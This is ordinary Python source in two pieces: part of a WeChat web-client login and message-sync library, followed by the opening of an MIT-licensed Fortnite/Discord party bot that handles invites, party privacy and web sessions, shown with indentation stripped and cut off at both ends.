picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
elif self.isLogging:
logger.info('Log in time out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % (
uuid, int(-localTime / 1579), localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
if process_login_info(self, r.text):
return '200'
else:
return '400'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]):
logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text)
core.isLogging = False
return False
return True
def web_init(self):
url = '%s/webwxinit' % self.loginInfo['url']
params = {
'r': int(-time.time() / 1579),
'pass_ticket': self.loginInfo['pass_ticket'], }
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, params=params, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
def get_today():
return datetime.date.today()
today = get_today()
retryCount = 0
while self.alive:
try:
i = self.sync_check()
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = self.produce_msg(msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except requests.exceptions.ReadTimeout:
pass
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(3)
finally:
if get_today() > today:
today = get_today()
retryCount = 0
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
try:
r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# seems like status of typing, but before I make further achievement code will remain like this
return '2'
except:
raise
r.raise_for_status()
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.error('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0:
logger.error('Ret 0 Response: %s' % dic)
return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
index.py
|
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 gomashio1596
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
try:
import asyncio
import copy
import datetime
import json
import logging
import os
import platform
import random
import re
import socket
import string
import sys
import time
import traceback
import unicodedata
import webbrowser
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, as_completed
from enum import Enum
from functools import partial, wraps
from glob import glob
from threading import Thread, Timer
from typing import Any, Callable, List, Optional, Type, Union
except ModuleNotFoundError as e:
import traceback
print(traceback.format_exc())
import platform
print(f'Python {platform.python_version()}\n')
print('標準ライブラリの読み込みに失敗しました。Pythonのバージョンが間違っている可能性があります。Pythonの再インストールなどを試してみてください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load basic library. Python version maybe wrong. Try reinstall Python. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
try:
import aiohttp
import discord
import fortnitepy
import jaconv
import requests
import sanic.exceptions
import sanic.response
from aioconsole import ainput
from crayons import cyan, green, magenta, red, yellow
from fortnitepy import ClientPartyMember
from jinja2 import Environment, FileSystemLoader
from sanic import Sanic
from sanic.request import Request
except ModuleNotFoundError as e:
print(traceback.format_exc())
print(f'Python {platform.python_version()}\n')
print('サードパーティーライブラリの読み込みに失敗しました。INSTALL.bat を実行してください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load third party library. Please run INSTALL.bat. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
if sys.platform == 'win32':
asyncio.set_event_loop(asyncio.ProactorEventLoop())
else:
try:
import uvloop
except ModuleNotFoundError:
pass
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
if True: #Classes
class PartyPrivacy(Enum):
PUBLIC = {
'partyType': 'Public',
'inviteRestriction': 'AnyMember',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Leader',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
PRIVATE_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Noone',
'invitePermission': 'Anyone',
'acceptingMembers': False,
}
PRIVATE = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Noone',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
class bool_:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True}
return d.get(content.lower(), False)
class bool_none:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True, "none": None}
return d.get(content.lower(), False)
class select:
def __init__(self, content: List[dict]) -> None:
self.content = content
class Red:
pass
class FixRequired:
pass
class CanLinebreak:
pass
class LoginManager:
def __init__(self) -> None:
self.id_len = 64
self.expire_time = datetime.timedelta(minutes=10)
self.expires = {}
self.cookie_key = "X-SessionId"
self.no_auth_handler_ = sanic.response.html("Unauthorized")
def generate_id(self, request: Request) -> str:
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
while Id in self.expires.keys():
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
return Id
def authenticated(self, request: Request) -> bool:
if data["web"]["login_required"]:
Id = request.cookies.get(self.cookie_key)
if not Id:
return False
elif Id in self.expires.keys():
return True
else:
return False
else:
return True
def login_user(self, request: Request, response: Type[sanic.response.BaseHTTPResponse]) -> None:
Id = self.generate_id(request)
response.cookies[self.cookie_key] = Id
self.expires[Id] = datetime.datetime.utcnow() + self.expire_time
def logout_user(self, request: Request, response: Type[sanic.response.BaseHTTPResponse]) -> None:
Id = request.cookies.get(self.cookie_key)
if Id:
del response.cookies[self.cookie_key]
self.expires[Id] = datetime.datetime.utcnow() + self.expire_time
def login_required(self, func: Callable):
@wraps(func)
def deco(*args: Any, **kwargs: Any):
request = args[0]
if self.authenticated(request):
return func(*args, **kwargs)
elif isinstance(self.no_auth_handler_, sanic.response.BaseHTTPResponse):
return self.no_auth_handler_
elif callable(self.no_auth_handler_):
return self.no_auth_handler_(*args, **kwargs)
return deco
def no_auth_handler(self, func: Callable):
if asyncio.iscoroutinefunction(func) is False:
raise ValueError("Function must be a coroutine")
self.no_auth_handler_ = func
@wraps(func)
def deco(*args: Any, **kwargs: Any):
return func(*args, **kwargs)
return deco
class WebUser:
def __init__(self, sessionId: str) -> None:
self._id = sessionId
@property
def display_name(self) -> None:
return "WebUser"
@property
def id(self) -> None:
return self._id
class WebMessage:
def __init__(self, content: str, sessionId: str, client: fortnitepy.Client) -> None:
self._sessionId = sessionId
self._content = content
self._client = client
self._author = WebUser(self._sessionId)
self._messages = []
@property
def author(self) -> WebUser:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> Type[fortnitepy.Client]:
return self._client
@property
def result(self) -> str:
return self._messages
def reply(self, content: str) -> None:
self._messages.append(content)
class AllMessage:
def __init__(self,
content: str,
author: Union[fortnitepy.user.UserBase, discord.abc.User, WebUser],
client: fortnitepy.Client,
base: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]
) -> None:
self._content = content
self._author = author
self._client = client
self._base = base
self._messages = {}
@property
def author(self) -> WebUser:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> fortnitepy.Client:
return self._client
@property
def base(self) -> Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]:
return self._base
@property
def result(self) -> str:
return self._messages
def reply(self, content: str, client: fortnitepy.Client) -> None:
if not self._messages.get(client.user.id):
self._messages[client.user.id] = []
self._messages[client.user.id].append(content)
class CanBeMultiple:
pass
class Client(fortnitepy.Client):
def __init__(self, emote: str, **kwargs: Any) -> None:
self.email = email
self.status_ = data['fortnite']['status']
self.eid = emote
self.boot_time = None
self.booted_utc = None
self.isready = False
self.booting = False
self.timer = None
self.acceptinvite_interval = True
self.stopcheck = False
self.outfitlock = False
self.backpacklock = False
self.pickaxelock = False
self.emotelock = False
self.owner = []
self.prevmessage = {}
self.select = {}
self.visual_members = []
self.invitelist = []
self.whisper = data['fortnite']['whisper']
self.partychat = data['fortnite']['partychat']
self.discord = data['discord']['discord']
self.web = data['web']['web']
self.whisperperfect = data['fortnite']['disablewhisperperfectly']
self.partychatperfect = data['fortnite']['disablepartychatperfectly']
self.discordperfect = data['discord']['disablediscordperfectly']
self.joinmessageenable = data['fortnite']['joinmessageenable']
self.randommessageenable = data['fortnite']['randommessageenable']
self.outfitmimic = data['fortnite']['outfitmimic']
self.backpackmimic = data['fortnite']['backpackmimic']
self.pickaxemimic = data['fortnite']['pickaxemimic']
self.emotemimic = data['fortnite']['emotemimic']
self.outfitlock = data['fortnite']['outfitlock']
self.backpacklock = data['fortnite']['backpacklock']
self.pickaxelock = data['fortnite']['pickaxelock']
self.emotelock = data['fortnite']['emotelock']
self.acceptinvite = data['fortnite']['acceptinvite']
self.acceptfriend = data['fortnite']['acceptfriend']
super().__init__(**kwargs)
def get_cache_user(self, user: str) -> Optional[fortnitepy.User]:
if self.is_id(user):
users = {i.id: i for i in cache_users.values()}
else:
users = cache_users
return users.get(user)
def add_cache(self, user: fortnitepy.user.UserBase) -> None:
try:
if isinstance(user, fortnitepy.user.UserBase) and user.id:
if isinstance(user, fortnitepy.User):
if user.display_name:
cache_users[user.display_name] = user
else:
user = self.get_user(user.id)
if user and user.display_name:
cache_users[user.display_name] = user
except Exception:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
def inviteaccept(self) -> None:
send(name(self.user),l("inviteaccept"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite = True
def inviteinterval(self) -> None:
send(name(self.user),l("inviteinterval"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite_interval = True
def lock_check(self, author_id: str) -> bool:
if author_id in [client.user.id for client in loadedclients]:
return False
elif author_id in [owner.id for owner in self.owner]:
return False
elif data['fortnite']['whitelist-ignorelock'] and author_id in whitelist:
return False
elif author_id in [owner.id for owner in dclient.owner]:
return False
elif data['discord']['whitelist-ignorelock'] and author_id in whitelist_:
return False
return True
def is_most(self) -> None:
name = self.user.display_name
member_joined_at_most = [self.user.id, getattr(getattr(self.party,"me",None),"joined_at",datetime.datetime.now())]
for member_ in self.party.members:
self.add_cache(member_)
if member_.id in [i.user.id for i in loadedclients]:
if member_.id != self.user.id:
name += f"/{str(member_.display_name)}"
if member_.joined_at < member_joined_at_most[1]:
member_joined_at_most = [member_.id, getattr(member_, "joined_at", datetime.datetime.now())]
if self.user.id == member_joined_at_most[0]:
return name
return None
def get_client_data(self) -> defaultdict:
var = defaultdict(lambda: None)
if not self.isready:
return var
party = getattr(self,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(self.friends),
"pending_count": len(self.pending_friends),
"incoming_pending_count": len(self.incoming_pending_friends),
"outgoing_pending_count": len(self.outgoing_pending_friends),
"block_count": len(self.blocked_users),
"display_name": self.user.display_name,
"id": self.user.id,
"boot_time": int(time.time() - self.boot_time),
"client": self,
"whitelist": whitelist,
"whitelist_": whitelist_,
"blacklist": blacklist,
"blacklist_": blacklist_
}
)
return var
async def change_status(self) -> None:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_incoming_pending_count": sum([len(client_.incoming_pending_friends) for client_ in clients]),
"all_outgoing_pending_count": sum([len(client_.outgoing_pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients])
}
)
if data['discord']['enabled'] and dclient.isready:
var.update(
{
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"dclient": dclient
}
)
party = getattr(self,"party",None)
if party:
status = eval_format(self.status_,var)
self.status = status
status = self.party.construct_presence(status)
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
status = eval_format(self.status_,var)
self.status = status
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def status_loop(self) -> None:
while True:
try:
await self.change_status()
except Exception:
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
async def invitation_accept(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
try:
await invitation.accept()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_already_member_of_party"))
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(name(self.user),l("already_member_of_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("user_notfound"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("user_notfound"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['ingame-error']:
await invitation.sender.send(l("error_private_party"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_private_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_accepting_partyinvite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_accepting_partyinvite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
self.acceptinvite_interval = False
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['inviteinterval']:
try:
self.timer.cancel()
except Exception:
pass
self.acceptinvite_interval = False
self.timer = Timer(data['fortnite']['interval'], self.inviteinterval)
self.timer.start()
if data['loglevel'] == 'normal':
send(name(self.user),l("accepted_invite_from", name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(name(self.user),f'{l("accepted_invite_from2", f"{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id)}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def invitation_decline(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_from", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_from2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_interval(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_interval3", str(data["fortnite"]["interval"])))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_interval", str(invitation.sender.display_name), str(data["fortnite"]["interval"])),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_interval2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id, str(data["fortnite"]["interval"])),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_owner(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_owner3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_owner", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_owner2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_whitelist(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_whitelist3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_whitelist", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
